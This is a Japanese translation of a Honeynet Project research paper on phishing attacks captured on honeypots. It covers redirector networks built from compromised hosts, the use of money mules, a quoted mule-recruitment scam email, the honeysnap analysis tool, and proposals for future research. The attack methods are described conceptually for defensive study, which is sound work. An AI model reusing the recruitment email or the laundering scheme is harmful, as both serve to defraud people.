この例では,中央のウェブサーバが物理的なフィッシングコンテンツを持ち,たびたび複数のウェブサイトを持っている (例えば eBay のフィッシングサイトは /ebay に, PayPal のフィッシングサイトは /paypal にある). いくつかの脆弱なリモートコンピュータはポートリダイレクターの redir の助けで,中央のウェブサーバのTCPポート 80 に外から来る HTTP トラフィックをリダイレクトする. この方法は攻撃者から見て単一のフィッシングウェブサイトよりもいくつかの利点がある:

  • リモートの redir を使ったホストが発見された場合,被害者はおそらくシステムをオフラインにし,再インストールするだろう. しかしこの方法ではフィッシャーは大きな損害を受けない.なぜならメインのフィッシングウェブサイトはまだオンラインであり,他の redir を使ったホストがHTTPトラフィックを中央のウェブサイトに送り続けているからである.
  • 中央のフィッシングサーバが発見された場合も,おそらくシステムはオフラインにされるだろう. その場合には,フィッシャーは簡単に新しいフィッシングサイトを侵入したシステムに作る.そしてほかの redir ホストのトラフィックを新しい中央のフィッシングサイトにリダイレクトするように置き換えるだけで調整できる. このテクニックにより全体のネットワークを利用可能にし,直ちにフィッシング攻撃を再開できるのである.
  • redir ホストはとても融通が利くので,簡単にほかのフィッシングウェブサイト用に設定を変更することが容易である. これはセキュリティ侵害してからフィッシングウェブサイトを利用可能にするまでの時間を短縮し,フィッシング攻撃をしている時間を増やすことになる.

そのようなテクニックを使うことからも単純なスクリプトキディの仕業に比べ,より組織的で有能な攻撃者の仕業であると言える. 類似した操作をするモデルとしては,大きなウェブホスティングの企業と多量のコンテンツを持つプロバイダがあげられる.

更なる観察 - 資金の移動

私たちの研究もフィッシャーがどのようにして入手した銀行のアカウントの情報を利用するのかを説明する.例えば,銀行のアカウントの情報とはアカウントナンバーの仲間である TAN (インターネットの銀行で使われているトランザクションナンバー) である. 外貨の移動は大抵の銀行に監視されているため,フィッシャーが金融当局に警戒されずに巨額の資金を他国へ移動することは簡単にできるものではない. そのためフィッシャーは資金を中継させなければならない.フィッシャーは被害者の銀行のアカウントから同じ国の中継のためのアカウントへ資金を移す. 中継したアカウントから資金を引き出す (このサービスにより,手数料が差し引かれる).そして例えば普通郵便でフィッシャーに送られる. もちろん,中継人を捕まえてもフィッシャーの金は常に通過しているため彼らはたいしたリスクを負うことはない.しかも簡単に中継を置き換えてルートを変えることができる. フィッシング攻撃後の資金移動の構造を示す例となるEメールを以下に示す:

こんにちは.
私たちは,ヨーロッパのクライアントから販売して得た資金を
銀行で受け渡してくださる方を探しています.
ロシアでは国際的な譲渡で税を払う必要はありません.
送金していただくと,あなたが受け取った額の10%は提供し,
すべての手数料は支払います.
ただし,1日総額1000ユーロまでとなります.
これはヨーロッパで合法な活動です.
http://XXX.info/index.php のフォームに急いですべての項目に入力してください.
(入力する前にyahooメッセンジャーかMSNメッセンジャーをインストールしてください.)

_________________________________________________________

Wir, europäische Personen findend, die Bankleitungen
davon Senden/erhalten können unsere Verkäufe, von
unseren Kunden von Deutschland. STEUERN von internationalen
Übertragungen in Russland nicht zu bezahlen. Wir
erhält das Prozent des Angebots 10 % vom Betrag und
bezahlt alle Schulgelder, um Kapital zurück zu senden.
Betrag von 1000 Euro pro Tag. Diese ganze Tätigkeit
ist in Europa gesetzlich.
Füllen Sie diese Form: http://XXX.info/index.php (bevor
die Füllung Yahoo installiert! Bote bitte oder msn), Sie
recieve volle Details sehr.

Thank you, FINANCIE LTD.

これは英語からドイツ語へのひどい訳でおそらくコンピュータに作らせたものであり,攻撃者は英語のネイティブスピーカーではないといえる. 資金はロシアに送られ,攻撃者はおそらくこの国で引き出したのだろう. この行動によってフィッシング攻撃が共通的により組織的になっている.

Honeysnap - 事件の解析のアシスタント

既にあげたフィッシングテクニックによって英国のハニーネットがセキュリティ侵害されたときのデータは,解析することでただちに結論を出せる. - 別々のグループから同時に攻撃されたために,詳細に解析できるようになるまでにネットワークストリームからのデータの展開と準備のための時間が必要だった. データの展開作業は繰り返しで退屈である.もし手動で行うと大切な解析の時間を使っていまい,能率が悪い. 自動化するソリューションが求められた.

honeysnap スクリプトは英国はニーネットプロジェクトの David Watson によって書かれた.これはこのアイディアをもとに作られたもので, 1 日を基準としてハニーネットのデータを処理し,簡単な要約を手動の解析の後に出力するようにデザインされている. honeysnap スクリプトはそれぞれのハニーポットのデータを分析し,外に出る HTTP,FTP GET,IRC メッセージ,Sebek キーストロークログのリストを与える. TCP ストリームは接続ごとに再び集められ,種類ごとに自動的に分類され,これを展開するには FTP や HTTP で認証してからファイルをダウンロードすればよい.事件の解析のための準備に時間をかけなくて済み,解析者は事件の鍵を調査することに集中できる. honeysnapも自動的に IRC トラフィックから興味のあるキーワード (例えば bank, account, password) を自動的に抜き出し,日々の要約をEメールでリポートする.

現在のところ honeysnap は基本的に UNIX シェルスクリプトであり,アルファリリースをここで見つけられるだろう.そしてhoneysnapの出力結果のサンプルはここにある. 現在,ハニーネットプロジェクトのメンバーによって Python で記述したモジュール式で拡張性の高いバージョンを開発中であり,2005年6月にコミュニティにβリリースする予定である.

更なる研究

この情報はフィッシングの分野でいくつかの可能性のある将来の研究の手段を示した.私たちは以下の議題についてさらに調べることを勧める:

私たちはハニーポットをスパマーやフィッシャーと戦うことを助けるために使われるように研究したい. 可能性のある研究のプロジェクトとしては,フィッシング攻撃を観察したら正常なタイプのハニーポットを追加して配置するか,スパマーにとって魅力的なターゲット (例えば SMTP オープンリレーを用意する) を用意することである. 特にボットネットを利用したフィッシングの分野では,フィッシング攻撃の構造を更に理解するために,システムへの攻撃を更に解析し,フィッシングテクニックの進展を追跡することが重要である. ほかに可能な研究としては,ハニーポットのアイディアをより発展させ,"client-side honeypot" を作ることである. 次世代のハニーポットは能動的に通信ネットワークに参加するようになるだろう.例えば自動的にスパムメールのリンクをたどりターゲットコンテンツにアクセスするのである. 通信ネットワークの危険に関する私たちの知識を更に改良するには,client-side honeypot は IRC チャンネルか,ファイルを共有/ダウンロードのためのピアツーピアネットワークをアイドリングさせることである.

さらに,私たちはフィッシング攻撃を数え,停止させる方法を探したい. なので,これは非常に難しい仕事であるが,ソースホストから広範囲に拡散するとき,数時間や数日の間にフィッシング攻撃をするであろう限定した時間帯を知りたい. 本研究ではこの分野 (例えば The AntiPhishing Group や PhishReport) エンドユーザ受け取ったフィッシングEメールを集めることに注力した. 実現可能なアプローチは,事件のライフサイクルの最終段階まで捕らえることである. 自動化はフィッシング攻撃を捕らえ,反応することに適している.

私たちはブラックハットの間でおそらく IRC を通してアカウントとパスワードが交換されているのではないかと疑っている. ハニーネットテクノロジは通信を捕捉し,更にフィッシング攻撃を理解するために使うことができた. さらに,中央のウェブサーバや FTP サーバにいくつかアップロードされたファイルがダウンロードされていることを見ることができた. しかしさらに議論するためにはそのような活動を監視し,フィッシングを防ぐことに協力するシステム管理者と接触し,そのような研究をするためのフレームワークと可能性のある対応策を確立することが必要である.

更なる仕事は解析の自動化を要求される.特にこのような攻撃をされている間に捕捉したデータを自動的にプロファイリングすることにである. トラフィックと IP アドレスの抽出,DNS の逆引きと IP ブロックの所有者の調査,IP アドレスごとやドメインごとのトラフィックの概算,受動的なオペレーティングシステムのフィンガープリンティング,これらは大きなデータセットを解析する上で有用である.このデータセットとは,Known hosts,攻撃者,侵入検知パターン,メッセージコンテンツなどである. 長期的には,同一の基準にしてそのような情報を共有することと,悪意のある者の活動の拡散の解析をサポートするグローバルなデータベースは非常に望まれており,コミュニティに重大な利益をもたらすだろう.

結論

この文書では私たちはいくつかの実世界のフィッシング攻撃の例と,そのような事件における攻撃者の行動の全てのライフサイクルを紹介した. すべての情報は高対話型ハニーポットで捕捉し,ハニーネットテクノロジの強力なツールで情報の保証と解析を行った. 私たちは German Honeynet Project と UK Honeynet Project が配置したハニーポットが受けた複数の攻撃を解析した. それぞれの事件でフィッシャーはハニーポットシステムを攻撃し,セキュリティ侵害した.しかし侵入してからの行動は異なり,いくつものフィッシング攻撃のテクニックを観察できた:

  1. 有名なオンラインの銀行をターゲットとしたフィッシングウェブサイトをセットアップする.
  2. フィッシングウェブサイトを宣伝するスパムメールを送信する.
  3. 既にあるフィッシングウェブサイトへウェブのトラフィックをリダイレクトするサービスをインストールする.
  4. スパムメールとフィッシングメッセージをボットネットを通して広める.

フィッシャーの特徴的な行動と被害者を魅了し騙す方法が,このデータによって理解しやすくなった. 私たちはフィッシング攻撃が非常に速やかに行われることを学んだ.この限られた時間に,システムに侵入し,フィッシングウェブサイトをオンラインにし,このウェブサイトを広告するスパムメッセージを送信する.このスピードが追跡と予防を難しくするのである. 特にフィッシング攻撃の被害者の IP アドレスのブロックは家庭や小企業の DSL のアドレスである.おそらくシステムはあまり管理されず,現在のセキュリティパッチにアップデートしていないのだろう.そして攻撃者も有名な企業のシステムをターゲットにはしないだろう. 一斉に小さな組織を数多く攻撃されると反応は難しくなる. 私たちはおそらくスパムメッセージを読んだエンドユーザがフィッシングコンテンツにアクセスすることを観察し,多くの人がその攻撃の被害者になる危険があったことに驚かされた.

私たちの研究もフィッシング攻撃がより広範囲で組織的になっていることを示した. オンラインのブランドをターゲットにした既設のフィッシングウェブサイトを得ることで,直ちに設置の準備した.これは組織的なフィッシンググループによる仕業だと言える. ポートリダイレクトやボットネットでネットワーク接続を確立し,非常に速く広めることができる. 大量のスキャニングとウェブやスクリプトにあるハードコードされた IP アドレスに関連づけたとき,多くの場合,特定のフィッシングサイトは常に活動しているだろう. ウェブトラフィックが別の脆弱なサーバに到達する.その前に,フィッシングコンテンツのアップロードは完了し,フィッシングのスパムメールはある侵入されたホストから配信される.このホストは常に送信しているわけではない.このことから,組織的なグループによって分散され並列なフィッシングが行われていると言える.

中継人を使った資金の移動の隠し方だけでなく,スパムメールとボットネットネットとフィッシング攻撃の繋がりを示した. 多量の脆弱性のスキャニングと定量的なデータと二段階のフィッシングネットワークを組み合わせて観察した.このことからフィッシャーの脅威は現実的になり,行動は組織的になり,方法は非常に高度であることを示した. 多く賭けるほど多く戻ってくるように,フィッシングテクニックは高度になり,近年フィッシング攻撃が増加し続けている. ボットネットに寄与する脆弱な PC を減らし,増え続ける多量のスパムメールに逆い,組織的な犯行を防ぎ,ソーシャルエンジニアリングに残るすべての重要なセキュリティの課題のリスクをインターネットユーザに教育しよう.

この文書のサブセクションの詳細は以下のリンクから見つけられるだろう:

質問とコメントは直接German Honeynet ProjectUK Honeynet Project にしてほしい.

The Honeynet Project
Comments